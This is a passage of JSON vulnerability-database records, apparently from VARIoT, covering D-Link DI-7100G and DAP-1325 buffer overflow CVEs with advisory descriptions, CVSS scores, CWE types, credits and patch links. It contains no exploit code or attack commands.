"db": "NVD",
"id": "CVE-2025-11339",
"trust": 3.2
},
{
"db": "VULDB",
"id": "327222",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2025-020078",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2025-24760",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-24760"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-020078"
},
{
"db": "NVD",
"id": "CVE-2025-11339"
}
]
},
"id": "VAR-202510-0075",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-24760"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-24760"
}
]
},
"last_update_date": "2025-11-28T23:14:47.874000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-120",
"trust": 1.0
},
{
"problemtype": "CWE-119",
"trust": 1.0
},
{
"problemtype": "Buffer error (CWE-119) [ others ]",
"trust": 0.8
},
{
"problemtype": " Classic buffer overflow (CWE-120) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-020078"
},
{
"db": "NVD",
"id": "CVE-2025-11339"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://vuldb.com/?id.327222"
},
{
"trust": 1.8,
"url": "https://vuldb.com/?submit.664635"
},
{
"trust": 1.8,
"url": "https://www.dlink.com/"
},
{
"trust": 1.6,
"url": "https://vuldb.com/?ctiid.327222"
},
{
"trust": 1.0,
"url": "https://www.yuque.com/jh0ng/vmpda6/zr11zfssl8h74bn3"
},
{
"trust": 1.0,
"url": "https://www.yuque.com/jh0ng/vmpda6/zr11zfssl8h74bn3#wjajr"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2025-11339"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-24760"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-020078"
},
{
"db": "NVD",
"id": "CVE-2025-11339"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2025-24760"
},
{
"db": "JVNDB",
"id": "JVNDB-2025-020078"
},
{
"db": "NVD",
"id": "CVE-2025-11339"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-10-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-24760"
},
{
"date": "2025-11-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2025-020078"
},
{
"date": "2025-10-06T17:16:04.683000",
"db": "NVD",
"id": "CVE-2025-11339"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2025-10-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-24760"
},
{
"date": "2025-11-26T08:09:00",
"db": "JVNDB",
"id": "JVNDB-2025-020078"
},
{
"date": "2025-11-19T21:47:37.660000",
"db": "NVD",
"id": "CVE-2025-11339"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Corporation\u00a0 of \u00a0DI-7100G\u00a0C1\u00a0 Buffer error vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2025-020078"
}
],
"trust": 0.8
}
}
VAR-202310-0248
Vulnerability from variot - Updated: 2025-11-28 04:23D-Link DAP-1325 SetAPLanSettings IPAddr Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18827. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support switching between wired and wireless networks or connecting to different wireless networks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202310-0248",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-1325",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-1325 firmware 1.09b03"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1506"
},
{
"db": "CNVD",
"id": "CNVD-2025-29322"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028369"
},
{
"db": "NVD",
"id": "CVE-2023-44408"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1506"
}
],
"trust": 0.7
},
"cve": "CVE-2023-44408",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29322",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44408",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44408",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44408",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-44408",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-44408",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-44408",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-44408",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29322",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1506"
},
{
"db": "CNVD",
"id": "CNVD-2025-29322"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028369"
},
{
"db": "NVD",
"id": "CVE-2023-44408"
},
{
"db": "NVD",
"id": "CVE-2023-44408"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-1325 SetAPLanSettings IPAddr Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18827. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support switching between wired and wireless networks or connecting to different wireless networks",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-44408"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028369"
},
{
"db": "ZDI",
"id": "ZDI-23-1506"
},
{
"db": "CNVD",
"id": "CNVD-2025-29322"
}
],
"trust": 2.79
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-44408",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-23-1506",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028369",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-18827",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29322",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1506"
},
{
"db": "CNVD",
"id": "CNVD-2025-29322"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028369"
},
{
"db": "NVD",
"id": "CVE-2023-44408"
}
]
},
"id": "VAR-202310-0248",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29322"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29322"
}
]
},
"last_update_date": "2025-11-28T04:23:44.594000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for D-Link DAP-1325 IPAddr Stack Buffer Overflow Remote Code Execution Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/757441"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29322"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028369"
},
{
"db": "NVD",
"id": "CVE-2023-44408"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1506/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-44408"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29322"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028369"
},
{
"db": "NVD",
"id": "CVE-2023-44408"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1506"
},
{
"db": "CNVD",
"id": "CNVD-2025-29322"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028369"
},
{
"db": "NVD",
"id": "CVE-2023-44408"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1506"
},
{
"date": "2025-11-24T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29322"
},
{
"date": "2025-03-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028369"
},
{
"date": "2024-05-03T03:15:53.953000",
"db": "NVD",
"id": "CVE-2023-44408"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-04T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1506"
},
{
"date": "2025-11-25T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29322"
},
{
"date": "2025-03-13T04:56:00",
"db": "JVNDB",
"id": "JVNDB-2023-028369"
},
{
"date": "2025-03-12T17:41:20.377000",
"db": "NVD",
"id": "CVE-2023-44408"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-1325\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028369"
}
],
"trust": 0.8
}
}
VAR-202310-0083
Vulnerability from variot - Updated: 2025-11-28 04:19D-Link DAP-1325 SetAPLanSettings DeviceName Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18825. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support wired/wireless network switching or connection to different wireless networks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202310-0083",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-1325",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.09b03"
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-1325",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-1325 firmware 1.09b03"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1504"
},
{
"db": "CNVD",
"id": "CNVD-2025-29320"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028370"
},
{
"db": "NVD",
"id": "CVE-2023-44406"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1504"
}
],
"trust": 0.7
},
"cve": "CVE-2023-44406",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29320",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44406",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44406",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-44406",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-44406",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-44406",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-44406",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-44406",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29320",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1504"
},
{
"db": "CNVD",
"id": "CNVD-2025-29320"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028370"
},
{
"db": "NVD",
"id": "CVE-2023-44406"
},
{
"db": "NVD",
"id": "CVE-2023-44406"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-1325 SetAPLanSettings DeviceName Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-1325 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the handling of XML data provided to the HNAP1 SOAP endpoint. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-18825. D-Link Systems, Inc. of DAP-1325 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-1325 is a wireless network extender manufactured by D-Link, primarily used to extend wireless network coverage and support wired/wireless network switching or connection to different wireless networks",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-44406"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028370"
},
{
"db": "ZDI",
"id": "ZDI-23-1504"
},
{
"db": "CNVD",
"id": "CNVD-2025-29320"
},
{
"db": "VULMON",
"id": "CVE-2023-44406"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-44406",
"trust": 4.0
},
{
"db": "ZDI",
"id": "ZDI-23-1504",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028370",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-18825",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29320",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-44406",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1504"
},
{
"db": "CNVD",
"id": "CNVD-2025-29320"
},
{
"db": "VULMON",
"id": "CVE-2023-44406"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028370"
},
{
"db": "NVD",
"id": "CVE-2023-44406"
}
]
},
"id": "VAR-202310-0083",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29320"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29320"
}
]
},
"last_update_date": "2025-11-28T04:19:32.178000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for D-Link DAP-1325 SetAPLanSettings stack buffer overflow remote code execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/757431"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29320"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
